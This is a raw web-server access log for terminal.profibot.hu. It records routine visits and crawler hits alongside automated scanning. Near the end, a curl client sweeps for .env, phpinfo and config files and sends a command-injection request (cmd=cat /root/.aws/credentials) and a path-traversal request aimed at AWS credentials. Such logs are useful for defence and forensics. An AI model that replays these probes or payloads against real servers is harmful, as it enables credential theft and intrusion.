web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[27/Jan/2026:23:35:55 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 192.175.111.249] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://terminal.profibot.hu/" +[27/Jan/2026:23:35:55 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 192.175.111.246] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[27/Jan/2026:23:35:56 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 64.15.129.104] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[27/Jan/2026:23:35:56 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 192.175.111.252] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://terminal.profibot.hu/" +[27/Jan/2026:23:37:01 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 37.76.47.171] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[27/Jan/2026:23:37:01 +0000] - - 502 - GET https terminal.profibot.hu "/favicon.ico" [Client 37.76.47.171] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://terminal.profibot.hu/" +[27/Jan/2026:23:40:16 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 154.28.229.18] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[27/Jan/2026:23:40:20 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 104.164.173.203] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[27/Jan/2026:23:40:26 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 103.4.250.163] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[27/Jan/2026:23:58:26 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 91.231.89.124] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" +[28/Jan/2026:00:05:18 +0000] - - 301 - GET http terminal.profibot.hu "/favicon.ico" [Client 91.196.152.84] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" +[28/Jan/2026:00:05:22 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 91.196.152.87] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" +[28/Jan/2026:00:28:38 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 107.172.195.214] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[28/Jan/2026:00:28:38 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 104.164.173.64] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[28/Jan/2026:00:29:01 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 104.164.126.230] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[28/Jan/2026:00:36:24 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[28/Jan/2026:00:36:24 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[28/Jan/2026:00:36:24 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[28/Jan/2026:00:36:24 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[28/Jan/2026:01:09:37 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 34.219.155.110] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36" "-" +[28/Jan/2026:01:09:37 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 34.219.155.110] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:09:38 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 34.219.155.110] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" "http://terminal.profibot.hu" +[28/Jan/2026:01:09:38 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 34.219.155.110] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36" "http://terminal.profibot.hu" +[28/Jan/2026:01:10:34 +0000] - - 502 - GET https terminal.profibot.hu "/robots.txt" [Client 216.73.216.113] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[28/Jan/2026:01:14:33 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 100.23.93.124] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.96 Safari/537.36" "-" +[28/Jan/2026:01:14:33 +0000] - - 502 - GET https terminal.profibot.hu "/favicon.ico" [Client 100.23.93.124] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.96 Safari/537.36" "https://terminal.profibot.hu/" +[28/Jan/2026:01:14:35 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 100.23.93.124] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.96 Mobile Safari/537.36" "-" +[28/Jan/2026:01:14:36 +0000] - - 502 - GET https terminal.profibot.hu "/favicon.ico" [Client 100.23.93.124] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.96 Mobile Safari/537.36" "https://terminal.profibot.hu/" +[28/Jan/2026:01:18:27 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:01:18:27 +0000] - - 502 - GET https terminal.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:01:18:27 +0000] - - 502 - GET https terminal.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:01:18:27 +0000] - - 502 - GET https terminal.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:01:21:03 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 98.84.1.175] [Length 154] [Gzip -] [Sent-to web-terminal] "-" "-" +[28/Jan/2026:01:21:48 +0000] - - 502 - GET https terminal.profibot.hu "/robots.txt" [Client 74.7.244.51] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/info.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/php-info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/newinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/siteinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/info.php.1" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/admin/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/pageinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/info.php.back" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/phpbb/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/release_info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/test/info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/info" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.php3" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.php.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/info.php.save.1" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/info.php_" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/_info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/admin_phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/dbinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/admin_info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/credentials" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/admin/admin_phpinfo.php4" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/pinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/.env.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:04 +0000] - - 502 - GET https terminal.profibot.hu "/.env.backup" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env_sample" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.old" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.www" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.docker/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.dev" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.example" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env_1" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.stage" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/config.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.pam_environment" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.environment" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.production" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.production.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/env.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.powenv" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.rbenv-gemsets" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.envs" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.docker" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.sample" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env_bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.development.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env-example" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.prod" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.docker.dev" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.test" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/env.list" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.ghc.environment" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/env.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/printenv" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.hsenv" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/environment" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/env.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/envrc" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/.env.dev.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:05 +0000] - - 502 - GET https terminal.profibot.hu "/environment.ts" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env_old" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.zshenv" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env.development.sample" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.rbenv-version" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env-sample" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env.prod.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env.travis" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env.test.sample" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env.2" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.vscode/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env.save" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/printenv.tmp" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.flaskenv" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env.test.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.jenv-version" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.envrc" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env.dist" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env.sample.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.env1" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/.venv" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/env.prod.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/env.test.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/env.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/env.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/admin/config?cmd=cat%20/root/.aws/credentials" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/k8s/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" 